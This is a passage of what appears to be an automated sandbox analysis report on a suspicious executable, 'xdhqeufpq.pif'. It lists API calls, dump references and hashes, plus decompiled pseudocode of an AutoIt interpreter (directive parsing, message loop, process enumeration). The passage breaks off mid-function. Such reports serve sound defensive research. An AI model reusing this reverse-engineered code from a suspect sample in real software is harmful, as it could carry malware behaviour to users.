                                            • GetModuleHandleW.KERNEL32(00000000,?,00C3CFBE,?), ref: 00C3D6C6
                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00C3CFBE,?), ref: 00C3D6D4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FindHandleModuleResource
                                            • String ID: RTL
                                            • API String ID: 3537982541-834975271
                                            • Opcode ID: 98704bbb4ad7c610e2ce4251f6f3dcfd987518837d8af815bef51760bd9388b8
                                            • Instruction ID: d2774e18221cc5708a2553393f4ee334f745f3f7b13d16f53eafe77c89d97b4b
                                            • Opcode Fuzzy Hash: 98704bbb4ad7c610e2ce4251f6f3dcfd987518837d8af815bef51760bd9388b8
                                            • Instruction Fuzzy Hash: 53C08031345B1166DF3017317D0DF472D5CBB01B51F150458F146D91D0DDE9C440C750
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: xdhqeufpq.pif PID: 6624 Parent PID: 6380 xdhqeufpq.pifCOMMON

                                            Executed Functions

                                            Function 012F98F0, Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                            Download Yara Rule
                                            APIs
                                            • _wcslen.LIBCMT ref: 012F9911
                                              • Part of subcall function 013014F7: _malloc.LIBCMT ref: 01301511
                                            • _memmove.LIBCMT ref: 012F995C
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301546
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301560
                                              • Part of subcall function 013014F7: __CxxThrowException@8.LIBCMT ref: 01301571
                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 012F99A3
                                            • _memmove.LIBCMT ref: 012F9FE6
                                            • _memmove.LIBCMT ref: 012FA914
                                            • _memmove.LIBCMT ref: 01319769
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                            • String ID:
                                            • API String ID: 2383988440-0
                                            • Opcode ID: 68a83d2158a983abdbe2085cdebbf59a94c1bc48cb02b35046536af7054b47a2
                                            • Instruction ID: 446df7de8aa94edefe6198cd95854da9a0b95d180c03a92fe0a84fa5c9347420
                                            • Opcode Fuzzy Hash: 68a83d2158a983abdbe2085cdebbf59a94c1bc48cb02b35046536af7054b47a2
                                            • Instruction Fuzzy Hash: 9413AF74614241CFDB28DF28C490B2AB7E5FF88308F14892DE68A8B355D771E845CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F35F0, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 012F1D10: _wcslen.LIBCMT ref: 012F1D11
                                              • Part of subcall function 012F1D10: _memmove.LIBCMT ref: 012F1D57
                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 012F3681
                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 012F3697
                                            • __wsplitpath.LIBCMT ref: 012F36C2
                                              • Part of subcall function 0130392E: __wsplitpath_helper.LIBCMT ref: 01303970
                                            • _wcscpy.LIBCMT ref: 012F36D7
                                            • _wcscat.LIBCMT ref: 012F36EC
                                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 012F36FC
                                              • Part of subcall function 013014F7: _malloc.LIBCMT ref: 01301511
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301546
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301560
                                              • Part of subcall function 013014F7: __CxxThrowException@8.LIBCMT ref: 01301571
                                              • Part of subcall function 012F3D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,012F378C,?,?,?,00000010), ref: 012F3D38
                                              • Part of subcall function 012F3D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 012F3D71
                                            • _wcscpy.LIBCMT ref: 012F37D0
                                            • _wcslen.LIBCMT ref: 012F3853
                                            • _wcslen.LIBCMT ref: 012F38AD
                                            Strings
                                            • Error opening the file, xrefs: 013181AF
                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0131817E
                                            • _, xrefs: 012F394C
                                            • Unterminated string, xrefs: 013182C6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                            • API String ID: 3393021363-188983378
                                            • Opcode ID: be9f83eb62bc589e2205825e7c508f26de9bf241d45800f58e1f6e7f3e631665
                                            • Instruction ID: 8d11fd63d2e55f519960a06a468a710d969fcb9ed5729d37a6b069833e855d6e
                                            • Opcode Fuzzy Hash: be9f83eb62bc589e2205825e7c508f26de9bf241d45800f58e1f6e7f3e631665
                                            • Instruction Fuzzy Hash: 6ED1E3B1528342AAE725EF68C840AEFB7E8BF95308F04483DE6C553241DB75D649C7A3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01323EC5, Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01323EE2
                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 01323EF2
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 01323F1D
                                            • __wsplitpath.LIBCMT ref: 01323F48
                                              • Part of subcall function 0130392E: __wsplitpath_helper.LIBCMT ref: 01303970
                                            • _wcscat.LIBCMT ref: 01323F5B
                                            • __wcsicoll.LIBCMT ref: 01323F6B
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 01323FA4
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                            • String ID:
                                            • API String ID: 2431060436-0
                                            • Opcode ID: e8f399f10738f8b7e63e86b90e316c1417911af68f1d0903dbe24199ddca7976
                                            • Instruction ID: 4ae4fd2aa0a0210f5073e9dd009476e2f7d7f3b4a234a5e1a834df8fc7155234
                                            • Opcode Fuzzy Hash: e8f399f10738f8b7e63e86b90e316c1417911af68f1d0903dbe24199ddca7976
                                            • Instruction Fuzzy Hash: 4721A3B6500219ABDB21EF54EC84FEAB7FCBB48304F0045D9F64997141EB75AA89CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0132399B, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00000000), ref: 013239AC
                                            • FindFirstFileW.KERNELBASE(?,?), ref: 013239BD
                                            • FindClose.KERNEL32(00000000), ref: 013239D0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFind$AttributesCloseFirst
                                            • String ID:
                                            • API String ID: 48322524-0
                                            • Opcode ID: 27df509a4dcdbfb8e42bad67df6679c333799fd6714734a6be7c61e522e98bc2
                                            • Instruction ID: 829be119b58888e8704cdc6064dc86e7d4180b2aa5c1d6c41aaf1112196414de
                                            • Opcode Fuzzy Hash: 27df509a4dcdbfb8e42bad67df6679c333799fd6714734a6be7c61e522e98bc2
                                            • Instruction Fuzzy Hash: 33E092369145189BC620BA7CBC094EA779CEB0A339F000752FE38D21C0D734999087D6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F3C50, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 57%
                                            			E012F3C50(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8196;
				void* __ebx;
				void* __edi;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				signed int _t65;
				void* _t67;
				intOrPtr _t68;
				signed int _t72;
				intOrPtr _t76;
				signed int _t86;
				char* _t96;
				intOrPtr _t101;
				void* _t116;
				intOrPtr* _t117;
				void* _t119;
				short* _t120;
				signed int _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t134 = __fp0;
				_t98 = __ecx;
				E01312160(0x2004);
				_t120 = _a4;
				if( *_t120 == 0x23) {
					_t96 = __ecx;
					_t44 = E0130333F(_t120, L"#notrayicon", 0xb);
					_t124 = _t123 + 0xc;
					__eflags = _t44;
					if(_t44 != 0) {
						_t45 = E0130333F(_t120, L"#requireadmin", 0xd);
						_t125 = _t124 + 0xc;
						__eflags = _t45;
						if(_t45 != 0) {
							_t46 = E0130333F(_t120, L"#NoAutoIt3Execute", 0xd);
							_t126 = _t125 + 0xc;
							__eflags = _t46;
							if(_t46 != 0) {
								_t47 = E0130333F(_t120, L"#OnAutoItStartRegister", 0x16);
								_t127 = _t126 + 0xc;
								__eflags = _t47;
								if(__eflags != 0) {
									_t48 = E0130333F(_t120, L"#include-once", 0xd);
									_t128 = _t127 + 0xc;
									__eflags = _t48;
									if(_t48 != 0) {
										_t49 = E0130333F(_t120, L"#include", 8);
										_t129 = _t128 + 0xc;
										__eflags = _t49;
										if(_t49 != 0) {
											_t50 = E0130333F(_t120, L"#comments-start", 0xf);
											_t130 = _t129 + 0xc;
											__eflags = _t50;
											if(__eflags == 0) {
												L28:
												_t117 = _a12;
												_a4 = 1;
												while(1) {
													_t51 = E0135FD26(__eflags, _a16, _t120); // executed
													__eflags = _t51;
													if(__eflags == 0) {
														break;
													}
													 *_t117 =  *_t117 + 1;
													E01334AA0(_t98, __eflags, _t120);
													E01334A44(_t98, _t120);
													_t58 = E0130333F(_t120, L"#comments-start", 0xf);
													_t130 = _t130 + 0xc;
													__eflags = _t58;
													if(__eflags == 0) {
														L36:
														_a4 = _a4 + 1;
														continue;
													}
													_t59 = E0130333F(_t120, L"#cs", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t59;
													if(__eflags == 0) {
														goto L36;
													}
													_t60 = E0130333F(_t120, L"#comments-end", 0xd);
													_t130 = _t130 + 0xc;
													__eflags = _t60;
													if(_t60 == 0) {
														L34:
														_t62 = _a4 - 1;
														_a4 = _t62;
														__eflags = _t62;
														if(__eflags > 0) {
															continue;
														}
														return 1;
													}
													_t64 = E0130333F(_t120, L"#ce", 3);
													_t130 = _t130 + 0xc;
													__eflags = _t64;
													if(__eflags != 0) {
														continue;
													}
													goto L34;
												}
												__eflags = _a4;
												if(__eflags <= 0) {
													L5:
													return 1;
												}
												E01343F89(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
												return 0;
											}
											_t65 = E0130333F(_t120, L"#cs", 3);
											_t130 = _t130 + 0xc;
											__eflags = _t65;
											if(__eflags != 0) {
												goto L5;
											}
											goto L28;
										}
										_push( &_v8196);
										_push(_t120 + 0x10);
										_push(_t96);
										_t67 = E01334AE1();
										_t101 = _a8;
										__eflags = _t67 - 1;
										_t68 =  *_a12;
										if(__eflags != 0) {
											E01343F89(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
											return 0;
										}
										_push(_t68);
										_push(_t120);
										_push(_t101);
										_push(E012FF290(_t96,  &_v8196, _t116));
										_push( &_v8196);
										_push(_t96);
										_t72 = E012F35F0( &_v8196, __fp0);
										__eflags = _t72;
										return 0 | _t72 != 0x00000000;
									}
									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
										goto L5;
									}
									_t121 = 0;
									__eflags = 0;
									while(1) {
										_t76 = E013013CB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
										_t128 = _t128 + 8;
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										_t121 = _t121 + 1;
										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
											continue;
										}
										return 1;
									}
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
								}
								_t122 = E012FF260(_t120 + 0x2c, __eflags);
								E01334A44(_t98, _t122);
								E01334AA0(_t98, __eflags, _t122);
								_t86 = E013010E1(_t122);
								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
									_push(_t122);
								} else {
									_t8 = _t122 + 2; // 0x2
									_t119 = _t8;
									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
									E01334A44(0, _t119);
									E01334AA0(0, __eflags, _t119);
									_push(_t119);
								}
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
								_push(_t122);
								E013010FC();
								return 1;
							}
							 *((char*)(_t96 + 2)) = 1;
							return 1;
						}
						 *((char*)(_t96 + 1)) = 1;
						return 1;
					}
					 *_t96 = 1;
					goto L5;
				}
				return 3;
			}









































                                            0x012f3c50
                                            0x012f3c50
                                            0x012f3c58
                                            0x012f3c5f
                                            0x012f3c67
                                            0x01318390
                                            0x01318392
                                            0x01318397
                                            0x0131839a
                                            0x0131839c
                                            0x013183b3
                                            0x013183b8
                                            0x013183bb
                                            0x013183bd
                                            0x013183d5
                                            0x013183da
                                            0x013183dd
                                            0x013183df
                                            0x013183f7
                                            0x013183fc
                                            0x013183ff
                                            0x01318401
                                            0x0131846b
                                            0x01318470
                                            0x01318473
                                            0x01318475
                                            0x013184cb
                                            0x013184d0
                                            0x013184d3
                                            0x013184d5
                                            0x0131853b
                                            0x01318540
                                            0x01318543
                                            0x01318545
                                            0x0131855f
                                            0x0131855f
                                            0x01318562
                                            0x01318569
                                            0x0131856e
                                            0x01318573
                                            0x01318575
                                            0x00000000
                                            0x00000000
                                            0x01318577
                                            0x0131857a
                                            0x01318580
                                            0x0131858d
                                            0x01318592
                                            0x01318595
                                            0x01318597
                                            0x013185ea
                                            0x013185ea
                                            0x00000000
                                            0x013185ea
                                            0x013185a1
                                            0x013185a6
                                            0x013185a9
                                            0x013185ab
                                            0x00000000
                                            0x00000000
                                            0x013185b5
                                            0x013185ba
                                            0x013185bd
                                            0x013185bf
                                            0x013185d5
                                            0x013185d8
                                            0x013185d9
                                            0x013185dc
                                            0x013185de
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x013185e0
                                            0x013185c9
                                            0x013185ce
                                            0x013185d1
                                            0x013185d3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x013185d3
                                            0x013185f2
                                            0x013185f6
                                            0x013183a1
                                            0x00000000
                                            0x013183a1
                                            0x0131860a
                                            0x00000000
                                            0x0131860f
                                            0x0131854f
                                            0x01318554
                                            0x01318557
                                            0x01318559
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01318559
                                            0x013184dd
                                            0x013184e1
                                            0x013184e2
                                            0x013184e3
                                            0x013184eb
                                            0x013184ee
                                            0x013184f0
                                            0x013184f2
                                            0x01318527
                                            0x00000000
                                            0x0131852c
                                            0x013184f4
                                            0x013184f5
                                            0x013184f6
                                            0x01318502
                                            0x01318509
                                            0x0131850a
                                            0x0131850b
                                            0x01318512
                                            0x00000000
                                            0x01318517
                                            0x01318477
                                            0x0131847a
                                            0x00000000
                                            0x00000000
                                            0x01318480
                                            0x01318480
                                            0x01318482
                                            0x0131848f
                                            0x01318494
                                            0x01318497
                                            0x01318499
                                            0x00000000
                                            0x00000000
                                            0x0131849b
                                            0x0131849c
                                            0x0131849f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x013184a1
                                            0x013184b3
                                            0x00000000
                                            0x013184bd
                                            0x0131840b
                                            0x0131840e
                                            0x01318414
                                            0x0131841a
                                            0x01318422
                                            0x01318428
                                            0x01318443
                                            0x0131842a
                                            0x0131842c
                                            0x0131842c
                                            0x01318430
                                            0x01318435
                                            0x0131843b
                                            0x01318440
                                            0x01318440
                                            0x0131844e
                                            0x01318450
                                            0x01318451
                                            0x00000000
                                            0x01318459
                                            0x013183e1
                                            0x00000000
                                            0x013183e5
                                            0x013183bf
                                            0x00000000
                                            0x013183c3
                                            0x0131839e
                                            0x00000000
                                            0x0131839e
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                            • API String ID: 1038674560-3360698832
                                            • Opcode ID: 1e8ab7055841237e15b295bd21fd8cc48925a7beae6ce5abecbec8fe7a1d692d
                                            • Instruction ID: 9891262f73a07e76d4ea02bbf97a1995b54e619ec28e38673b4d2ee01e922a25
                                            • Opcode Fuzzy Hash: 1e8ab7055841237e15b295bd21fd8cc48925a7beae6ce5abecbec8fe7a1d692d
                                            • Instruction Fuzzy Hash: 07613E71610316ABF725EB29DC52FAF739CAF1130CF044068FD05AA349EBB4E941C6A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F9430, Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E012F9430(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
				struct tagMSG _v32;
				char _v48;
				char _v64;
				char _v80;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v152;
				int _v156;
				char _v164;
				struct tagMSG _v188;
				struct HWND__* _v192;
				int _v196;
				struct HWND__* _v204;
				char _v208;
				struct HWND__* _v220;
				struct tagMSG _v244;
				char _v248;
				char _v252;
				long _v256;
				long _v260;
				struct HWND__* _v264;
				int _v268;
				struct HWND__* _v272;
				signed int _v276;
				char _v277;
				char _v288;
				int _v292;
				struct HWND__* _v300;
				struct HWND__* _v304;
				struct HWND__* _v308;
				struct tagMSG* _v312;
				char _v316;
				long _v324;
				signed int _v328;
				char _v329;
				struct HWND__* _v332;
				struct tagMSG* _v336;
				void* __ebx;
				void* __edi;
				signed int __esi;
				intOrPtr _t280;
				int _t282;
				intOrPtr _t283;
				struct tagMSG* _t285;
				struct HWND__* _t291;
				struct HWND__* _t295;
				intOrPtr* _t297;
				struct HWND__* _t299;
				struct HWND__* _t302;
				struct HWND__* _t307;
				struct HWND__* _t329;
				struct HWND__* _t331;
				struct HWND__* _t336;
				struct HWND__* _t337;
				struct HWND__* _t338;
				struct HWND__* _t342;
				struct HWND__* _t347;
				void* _t349;
				struct HWND__* _t355;
				struct tagMSG* _t358;
				long _t359;
				void* _t368;
				void* _t379;
				void* _t380;
				struct tagMSG* _t384;
				signed int _t385;
				void* _t400;
				signed int _t403;
				void* _t405;
				int _t406;
				void* _t407;
				struct HWND__* _t414;
				int _t415;
				struct HWND__* _t417;
				struct HWND__* _t423;
				intOrPtr _t431;
				struct HWND__* _t437;
				struct HWND__* _t442;
				intOrPtr _t460;
				void* _t462;
				struct tagMSG* _t467;
				signed int _t480;
				struct tagMSG* _t511;
				signed int _t545;
				void* _t549;
				struct tagMSG** _t552;
				struct HWND__** _t553;
				struct tagMSG* _t560;
				struct HWND__* _t564;
				struct HWND__* _t565;
				signed int _t566;
				signed int _t570;
				struct HWND__** _t572;
				void* _t598;

				_t606 = __fp0;
				_t511 = __edx;
				_t471 = __ecx;
				_t572 = (_t570 & 0xfffffff8) - 0x14c;
				_t533 = __ecx;
				_t280 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t280 >= 0xf3c) {
					 *0x13874e2 = 0;
					E0134E724(__fp0, __ecx, 0x9a, 0xffffffff);
					_t282 = 1;
					L33:
					return _t282;
				}
				_t283 = _t280 + 1;
				_v312 = __ecx;
				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
				if(_t283 == 1) {
					E012FFFF0(__ecx, __fp0);
				}
				_t533[0x51] = 0;
				if(_t533[0x3f] != 0) {
					L30:
					_t285 = _t533[0x3b];
					_t533[0x51] = 0;
					if(_t285 == 1) {
						E012FFF70(_t471, _t533);
						__eflags = _t533[0x3f] - 1;
						if(__eflags == 0) {
							goto L32;
						}
						E012F1C50(_t533, _t511, __eflags, _t606);
						LockWindowUpdate(0);
						DestroyWindow( *0x1387518);
						_t291 = GetMessageW( &_v32, 0, 0, 0);
						__eflags = _t291;
						if(_t291 <= 0) {
							goto L32;
						}
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t295 = GetMessageW( &_v32, 0, 0, 0);
							__eflags = _t295;
						} while (_t295 > 0);
						goto L32;
					} else {
						_t533[0x3b] = _t285 - 1;
						L32:
						_t282 = 0;
						goto L33;
					}
				} else {
					while(_t533[0x51] == 0) {
						if( *0x13874e3 != 0) {
							L10:
							if( *0x1398624 != 0) {
								_t297 =  *0x1398628; // 0x0
								_t460 =  *_t297;
								E01321D6C();
								_t299 = _t533[0x6c];
								_t545 = 0;
								__eflags = _t299;
								if(_t299 == 0) {
									L80:
									__eflags = _t545 - _t299;
									if(__eflags == 0) {
										goto L11;
									}
									E01354D61( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
									_t511 = _t533[0x6b];
									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
									_v276 =  &(_v276->i);
									E012FDE00( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
									E0136D2F8( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
									L29:
									if(_t533[0x3f] == 0) {
										continue;
									}
									goto L30;
								}
								_t471 = _t533[0x6b];
								do {
									_t511 = _t471->hwnd;
									__eflags = _t511->hwnd;
									if(_t511->hwnd == 0) {
										goto L79;
									}
									_t511 = _t511->hwnd;
									__eflags = _t511->hwnd - _t460;
									if(_t511->hwnd == _t460) {
										goto L80;
									}
									L79:
									_t545 = _t545 + 1;
									_t471 =  &(_t471->message);
									__eflags = _t545 - _t533[0x6c];
								} while (_t545 < _t533[0x6c]);
								goto L80;
							}
							L11:
							if( *0x13874ec == 1) {
								__eflags =  *0x13874e3;
								if( *0x13874e3 != 0) {
									goto L12;
								}
								Sleep(0xa);
								goto L29;
							}
							L12:
							if(_t533[0x118] != 0) {
								__eflags =  *0x139954c;
								if( *0x139954c != 0) {
									goto L13;
								}
								_t467 = _t533[0x116];
								 *0x139954c = 1;
								_v308 = 0;
								_v328 = _t467;
								while(1) {
									_t511 =  &_v328;
									 *_t572 = 0;
									_t329 = E013307BC(_t511, _t471);
									__eflags = _t329;
									if(_t329 == 0) {
										goto L93;
									}
									_t347 = _t467->hwnd;
									__eflags =  *((char*)(_t347 + 0x11));
									if( *((char*)(_t347 + 0x11)) != 0) {
										L92:
										_t471 =  &_v324;
										E013307CE( &_v328,  &_v324);
										_t467 = _v336;
										continue;
									}
									_v324 = _t347;
									_t349 = E012FC870( *((intOrPtr*)(_t347 + 0x14)));
									__eflags = _t511;
									if(__eflags < 0) {
										goto L92;
									}
									if(__eflags > 0) {
										L91:
										_v308 =  &(_v308->i);
										 *((intOrPtr*)(_t467->hwnd + 0x14)) = timeGetTime();
										E01354D61(_t467,  &_v248, __eflags, _t533, _t467,  &_v248,  &_v128,  &_v144,  &_v140);
										_t355 =  &(_v272->i);
										__eflags = _t355;
										_v272 = _t355;
										 *((char*)(_t467->hwnd + 0x10)) = 1;
										E0136D2F8(_t467, _t467->hwnd, _t606, _t533, _t355, 1, 0); // executed
										 *((char*)(_t467->hwnd + 0x10)) = 0;
										goto L92;
									}
									__eflags = _t349 -  *((intOrPtr*)(_v324 + 0x18));
									if(__eflags < 0) {
										goto L92;
									}
									goto L91;
								}
								while(1) {
									L93:
									_v328 = _t533[0x116];
									while(1) {
										L94:
										_t471 =  &_v328;
										 *_t572 = 0;
										_t331 = E013307BC( &_v328,  &_v328);
										__eflags = _t331;
										if(_t331 == 0) {
											break;
										}
										_t511 = _v328;
										_t342 = _t511->hwnd;
										__eflags =  *((char*)(_t342 + 0x11));
										if( *((char*)(_t342 + 0x11)) != 0) {
											E01342129( &(_t533[0x116]),  &_v328);
											L93:
											_v328 = _t533[0x116];
											continue;
										}
										_t471 =  &_v324;
										_t511 =  &_v328;
